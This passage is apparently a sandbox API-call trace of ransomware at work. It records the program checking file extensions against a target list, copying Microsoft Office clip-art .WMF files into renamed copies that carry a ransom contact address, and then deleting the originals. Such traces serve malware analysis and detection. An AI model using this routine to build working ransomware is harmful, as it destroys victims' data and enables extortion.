[0184.312] lstrlenW (lpString=".rar") returned 4 [0184.312] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0184.312] lstrlenW (lpString=".bz2") returned 4 [0184.312] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0184.312] lstrlenW (lpString=".7z") returned 3 [0184.312] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0184.312] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107490.WMF") returned 68 [0184.312] lstrlenW (lpString=".dbf") returned 4 [0184.312] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0184.312] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107490.WMF") returned 68 [0184.312] lstrlenW (lpString=".1cd") returned 4 [0184.312] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0184.312] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107490.WMF") returned 68 [0184.312] lstrlenW (lpString=".jpg") returned 4 [0184.312] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0184.313] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107490.WMF") returned 68 [0184.313] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107490.WMF") returned 68 [0184.313] lstrlenW (lpString=".doc") returned 4 [0184.313] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0184.313] lstrlenW (lpString=".docx") returned 5 [0184.313] lstrcmpiW (lpString1=".docx", lpString2="0.WMF") returned -1 [0184.313] lstrlenW (lpString=".pdf") returned 4 [0184.313] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0184.313] lstrlenW (lpString=".xls") returned 4 [0184.313] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0184.313] lstrlenW (lpString=".xlsx") returned 5 [0184.313] lstrcmpiW (lpString1=".xlsx", lpString2="0.WMF") returned -1 [0184.313] lstrlenW (lpString=".ppt") returned 4 [0184.313] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0184.313] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107490.WMF") returned 68 [0184.313] lstrlenW (lpString=".zip") returned 4 [0184.313] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0184.313] lstrlenW (lpString=".rar") returned 4 [0184.313] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0184.313] lstrlenW (lpString=".bz2") returned 4 [0184.313] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0184.313] lstrlenW (lpString=".7z") returned 3 [0184.313] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0184.313] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107490.WMF") returned 68 [0184.313] lstrlenW (lpString=".dbf") returned 4 [0184.314] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0184.314] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107490.WMF") returned 68 [0184.314] lstrlenW (lpString=".1cd") returned 4 [0184.314] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0184.314] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107490.WMF") returned 68 [0184.314] lstrlenW (lpString=".jpg") returned 4 [0184.314] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0184.314] lstrcmpiW (lpString1=".WMF", lpString2=".bat") returned 1 [0184.314] lstrlenW (lpString="J0107492.WMF") returned 12 [0184.314] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107492.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0107492.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x334 [0184.315] GetFileSizeEx (in: hFile=0x334, lpFileSize=0x311ff14 | out: lpFileSize=0x311ff14*=6860) returned 1 [0184.315] CloseHandle (hObject=0x334) returned 1 [0184.315] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107492.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0107492.wmf")) returned 0x220 [0184.315] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107492.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0107492.wmf.id-b4197730.[idecryptyourdata@cock.li].bat")) returned 0xffffffff [0184.315] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107492.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0107492.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x334 [0184.315] SetFilePointerEx (in: hFile=0x334, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x311fec0 | out: lpNewFilePointer=0x0) returned 1 [0184.315] SetFilePointerEx (in: hFile=0x334, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x311fec0 | out: lpNewFilePointer=0x0) returned 1 [0184.315] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107492.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0107492.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x380 [0184.316] GetLastError () returned 0x0 [0184.316] ReadFile (in: hFile=0x334, lpBuffer=0x3d12020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x311fecc, lpOverlapped=0x0 | out: lpBuffer=0x3d12020*, lpNumberOfBytesRead=0x311fecc*=0x1acc, lpOverlapped=0x0) returned 1 [0184.318] WriteFile (in: hFile=0x380, lpBuffer=0x3d12020*, nNumberOfBytesToWrite=0x1ad0, lpNumberOfBytesWritten=0x311fc94, lpOverlapped=0x0 | out: lpBuffer=0x3d12020*, lpNumberOfBytesWritten=0x311fc94*=0x1ad0, lpOverlapped=0x0) returned 1 [0184.319] ReadFile (in: hFile=0x334, lpBuffer=0x3d12020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x311fecc, lpOverlapped=0x0 | out: lpBuffer=0x3d12020*, lpNumberOfBytesRead=0x311fecc*=0x0, lpOverlapped=0x0) returned 1 [0184.319] WriteFile (in: hFile=0x380, lpBuffer=0x3d12020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x311fc94, lpOverlapped=0x0 | out: lpBuffer=0x3d12020*, lpNumberOfBytesWritten=0x311fc94*=0xec, lpOverlapped=0x0) returned 1 [0184.319] SetEndOfFile (hFile=0x380) returned 1 [0184.320] CloseHandle (hObject=0x380) returned 1 [0184.320] SetFilePointerEx (in: hFile=0x334, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x311fec0 | out: lpNewFilePointer=0x0) returned 1 [0184.320] SetEndOfFile (hFile=0x334) returned 1 [0184.321] CloseHandle (hObject=0x334) returned 1 [0184.321] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107492.WMF.id-B4197730.[idecryptyourdata@cock.li].bat", dwFileAttributes=0x220) returned 1 [0184.321] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107492.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0107492.wmf")) returned 1 [0184.322] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107492.WMF") returned 68 [0184.322] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107492.WMF") returned 68 [0184.322] lstrlenW (lpString=".doc") returned 4 [0184.322] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0184.322] lstrlenW (lpString=".docx") returned 5 [0184.322] lstrcmpiW (lpString1=".docx", lpString2="2.WMF") returned -1 [0184.322] lstrlenW (lpString=".pdf") returned 4 [0184.322] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0184.322] lstrlenW (lpString=".xls") returned 4 [0184.322] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0184.322] lstrlenW (lpString=".xlsx") returned 5 [0184.322] lstrcmpiW (lpString1=".xlsx", lpString2="2.WMF") returned -1 [0184.322] lstrlenW (lpString=".ppt") returned 4 [0184.322] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0184.322] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107492.WMF") returned 68 [0184.322] lstrlenW (lpString=".zip") returned 4 [0184.322] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0184.322] lstrlenW (lpString=".rar") returned 4 [0184.322] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0184.322] lstrlenW (lpString=".bz2") returned 4 [0184.322] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0184.322] lstrlenW (lpString=".7z") returned 3 [0184.322] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0184.322] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107492.WMF") returned 68 [0184.323] lstrlenW (lpString=".dbf") returned 4 [0184.323] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0184.323] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107492.WMF") returned 68 [0184.323] lstrlenW (lpString=".1cd") returned 4 [0184.323] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0184.323] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107492.WMF") returned 68 [0184.323] lstrlenW (lpString=".jpg") returned 4 [0184.323] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0184.323] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107492.WMF") returned 68 [0184.323] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107492.WMF") returned 68 [0184.323] lstrlenW (lpString=".doc") returned 4 [0184.323] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0184.323] lstrlenW (lpString=".docx") returned 5 [0184.323] lstrcmpiW (lpString1=".docx", lpString2="2.WMF") returned -1 [0184.323] lstrlenW (lpString=".pdf") returned 4 [0184.323] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0184.323] lstrlenW (lpString=".xls") returned 4 [0184.323] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0184.323] lstrlenW (lpString=".xlsx") returned 5 [0184.323] lstrcmpiW (lpString1=".xlsx", lpString2="2.WMF") returned -1 [0184.323] lstrlenW (lpString=".ppt") returned 4 [0184.323] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0184.323] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107492.WMF") returned 68 [0184.323] lstrlenW (lpString=".zip") returned 4 [0184.323] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0184.323] lstrlenW (lpString=".rar") returned 4 [0184.323] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0184.323] lstrlenW (lpString=".bz2") returned 4 [0184.323] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0184.324] lstrlenW (lpString=".7z") returned 3 [0184.324] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0184.324] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107492.WMF") returned 68 [0184.324] lstrlenW (lpString=".dbf") returned 4 [0184.324] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0184.324] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107492.WMF") returned 68 [0184.324] lstrlenW (lpString=".1cd") returned 4 [0184.324] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0184.324] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107492.WMF") returned 68 [0184.324] lstrlenW (lpString=".jpg") returned 4 [0184.324] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0184.324] lstrcmpiW (lpString1=".WMF", lpString2=".bat") returned 1 [0184.324] lstrlenW (lpString="J0107494.WMF") returned 12 [0184.324] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107494.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0107494.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x334 [0184.325] GetFileSizeEx (in: hFile=0x334, lpFileSize=0x311ff14 | out: lpFileSize=0x311ff14*=6424) returned 1 [0184.325] CloseHandle (hObject=0x334) returned 1 [0184.325] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107494.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0107494.wmf")) returned 0x220 [0184.325] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107494.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0107494.wmf.id-b4197730.[idecryptyourdata@cock.li].bat")) returned 0xffffffff [0184.325] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107494.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0107494.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x334 [0184.325] SetFilePointerEx (in: hFile=0x334, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x311fec0 | out: lpNewFilePointer=0x0) returned 1 [0184.325] SetFilePointerEx (in: hFile=0x334, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x311fec0 | out: lpNewFilePointer=0x0) returned 1 [0184.325] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107494.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0107494.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x380 [0184.648] GetLastError () returned 0x0 [0184.648] ReadFile (in: hFile=0x334, lpBuffer=0x3d12020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x311fecc, lpOverlapped=0x0 | out: lpBuffer=0x3d12020*, lpNumberOfBytesRead=0x311fecc*=0x1918, lpOverlapped=0x0) returned 1 [0184.650] WriteFile (in: hFile=0x380, lpBuffer=0x3d12020*, nNumberOfBytesToWrite=0x1920, lpNumberOfBytesWritten=0x311fc94, lpOverlapped=0x0 | out: lpBuffer=0x3d12020*, lpNumberOfBytesWritten=0x311fc94*=0x1920, lpOverlapped=0x0) returned 1 [0184.654] ReadFile (in: hFile=0x334, lpBuffer=0x3d12020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x311fecc, lpOverlapped=0x0 | out: lpBuffer=0x3d12020*, lpNumberOfBytesRead=0x311fecc*=0x0, lpOverlapped=0x0) returned 1 [0184.654] WriteFile (in: hFile=0x380, lpBuffer=0x3d12020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x311fc94, lpOverlapped=0x0 | out: lpBuffer=0x3d12020*, lpNumberOfBytesWritten=0x311fc94*=0xec, lpOverlapped=0x0) returned 1 [0184.654] SetEndOfFile (hFile=0x380) returned 1 [0184.654] CloseHandle (hObject=0x380) returned 1 [0184.654] SetFilePointerEx (in: hFile=0x334, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x311fec0 | out: lpNewFilePointer=0x0) returned 1 [0184.654] SetEndOfFile (hFile=0x334) returned 1 [0184.655] CloseHandle (hObject=0x334) returned 1 [0184.655] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107494.WMF.id-B4197730.[idecryptyourdata@cock.li].bat", dwFileAttributes=0x220) returned 1 [0184.655] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107494.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0107494.wmf")) returned 1 [0184.656] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107494.WMF") returned 68 [0184.656] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107494.WMF") returned 68 [0184.656] lstrlenW (lpString=".doc") returned 4 [0184.656] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0184.656] lstrlenW (lpString=".docx") returned 5 [0184.656] lstrcmpiW (lpString1=".docx", lpString2="4.WMF") returned -1 [0184.656] lstrlenW (lpString=".pdf") returned 4 [0184.656] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0184.656] lstrlenW (lpString=".xls") returned 4 [0184.656] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0184.656] lstrlenW (lpString=".xlsx") returned 5 [0184.656] lstrcmpiW (lpString1=".xlsx", lpString2="4.WMF") returned -1 [0184.656] lstrlenW (lpString=".ppt") returned 4 [0184.656] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0184.656] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107494.WMF") returned 68 [0184.656] lstrlenW (lpString=".zip") returned 4 [0184.656] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0184.656] lstrlenW (lpString=".rar") returned 4 [0184.656] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0184.656] lstrlenW (lpString=".bz2") returned 4 [0184.657] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0184.657] lstrlenW (lpString=".7z") returned 3 [0184.657] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0184.657] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107494.WMF") returned 68 [0184.657] lstrlenW (lpString=".dbf") returned 4 [0184.657] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0184.657] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107494.WMF") returned 68 [0184.657] lstrlenW (lpString=".1cd") returned 4 [0184.657] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0184.657] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107494.WMF") returned 68 [0184.657] lstrlenW (lpString=".jpg") returned 4 [0184.657] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0184.657] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107494.WMF") returned 68 [0184.657] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107494.WMF") returned 68 [0184.657] lstrlenW (lpString=".doc") returned 4 [0184.657] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0184.657] lstrlenW (lpString=".docx") returned 5 [0184.657] lstrcmpiW (lpString1=".docx", lpString2="4.WMF") returned -1 [0184.657] lstrlenW (lpString=".pdf") returned 4 [0184.657] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0184.657] lstrlenW (lpString=".xls") returned 4 [0184.657] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0184.657] lstrlenW (lpString=".xlsx") returned 5 [0184.657] lstrcmpiW (lpString1=".xlsx", lpString2="4.WMF") returned -1 [0184.657] lstrlenW (lpString=".ppt") returned 4 [0184.657] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0184.657] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107494.WMF") returned 68 [0184.657] lstrlenW (lpString=".zip") returned 4 [0184.658] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0184.658] lstrlenW (lpString=".rar") returned 4 [0184.658] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0184.658] lstrlenW (lpString=".bz2") returned 4 [0184.658] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0184.658] lstrlenW (lpString=".7z") returned 3 [0184.658] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0184.658] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107494.WMF") returned 68 [0184.658] lstrlenW (lpString=".dbf") returned 4 [0184.658] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0184.658] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107494.WMF") returned 68 [0184.658] lstrlenW (lpString=".1cd") returned 4 [0184.658] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0184.658] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107494.WMF") returned 68 [0184.658] lstrlenW (lpString=".jpg") returned 4 [0184.658] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0184.658] lstrcmpiW (lpString1=".WMF", lpString2=".bat") returned 1 [0184.658] lstrlenW (lpString="J0107526.WMF") returned 12 [0184.658] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107526.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0107526.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x334 [0184.659] GetFileSizeEx (in: hFile=0x334, lpFileSize=0x311ff14 | out: lpFileSize=0x311ff14*=7948) returned 1 [0184.659] CloseHandle (hObject=0x334) returned 1 [0184.659] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107526.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0107526.wmf")) returned 0x220 [0184.659] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107526.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0107526.wmf.id-b4197730.[idecryptyourdata@cock.li].bat")) returned 0xffffffff [0184.659] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107526.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0107526.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x334 [0184.659] SetFilePointerEx (in: hFile=0x334, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x311fec0 | out: lpNewFilePointer=0x0) returned 1 [0184.659] SetFilePointerEx (in: hFile=0x334, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x311fec0 | out: lpNewFilePointer=0x0) returned 1 [0184.660] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107526.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0107526.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x380 [0184.660] GetLastError () returned 0x0 [0184.660] ReadFile (in: hFile=0x334, lpBuffer=0x3d12020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x311fecc, lpOverlapped=0x0 | out: lpBuffer=0x3d12020*, lpNumberOfBytesRead=0x311fecc*=0x1f0c, lpOverlapped=0x0) returned 1 [0184.662] WriteFile (in: hFile=0x380, lpBuffer=0x3d12020*, nNumberOfBytesToWrite=0x1f10, lpNumberOfBytesWritten=0x311fc94, lpOverlapped=0x0 | out: lpBuffer=0x3d12020*, lpNumberOfBytesWritten=0x311fc94*=0x1f10, lpOverlapped=0x0) returned 1 [0184.663] ReadFile (in: hFile=0x334, lpBuffer=0x3d12020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x311fecc, lpOverlapped=0x0 | out: lpBuffer=0x3d12020*, lpNumberOfBytesRead=0x311fecc*=0x0, lpOverlapped=0x0) returned 1 [0184.663] WriteFile (in: hFile=0x380, lpBuffer=0x3d12020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x311fc94, lpOverlapped=0x0 | out: lpBuffer=0x3d12020*, lpNumberOfBytesWritten=0x311fc94*=0xec, lpOverlapped=0x0) returned 1 [0184.664] SetEndOfFile (hFile=0x380) returned 1 [0184.664] CloseHandle (hObject=0x380) returned 1 [0184.664] SetFilePointerEx (in: hFile=0x334, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x311fec0 | out: lpNewFilePointer=0x0) returned 1 [0184.664] SetEndOfFile (hFile=0x334) returned 1 [0184.665] CloseHandle (hObject=0x334) returned 1 [0184.665] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107526.WMF.id-B4197730.[idecryptyourdata@cock.li].bat", dwFileAttributes=0x220) returned 1 [0184.665] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107526.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0107526.wmf")) returned 1 [0184.666] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107526.WMF") returned 68 [0184.666] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107526.WMF") returned 68 [0184.666] lstrlenW (lpString=".doc") returned 4 [0184.666] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0184.666] lstrlenW (lpString=".docx") returned 5 [0184.666] lstrcmpiW (lpString1=".docx", lpString2="6.WMF") returned -1 [0184.666] lstrlenW (lpString=".pdf") returned 4 [0184.666] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0184.666] lstrlenW (lpString=".xls") returned 4 [0184.666] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0184.666] lstrlenW (lpString=".xlsx") returned 5 [0184.666] lstrcmpiW (lpString1=".xlsx", lpString2="6.WMF") returned -1 [0184.666] lstrlenW (lpString=".ppt") returned 4 [0184.666] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0184.666] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107526.WMF") returned 68 [0184.666] lstrlenW (lpString=".zip") returned 4 [0184.666] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0184.666] lstrlenW (lpString=".rar") returned 4 [0184.666] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0184.666] lstrlenW (lpString=".bz2") returned 4 [0184.666] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0184.666] lstrlenW (lpString=".7z") returned 3 [0184.666] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0184.666] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107526.WMF") returned 68 [0184.666] lstrlenW (lpString=".dbf") returned 4 [0184.666] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0184.666] lstrlenW 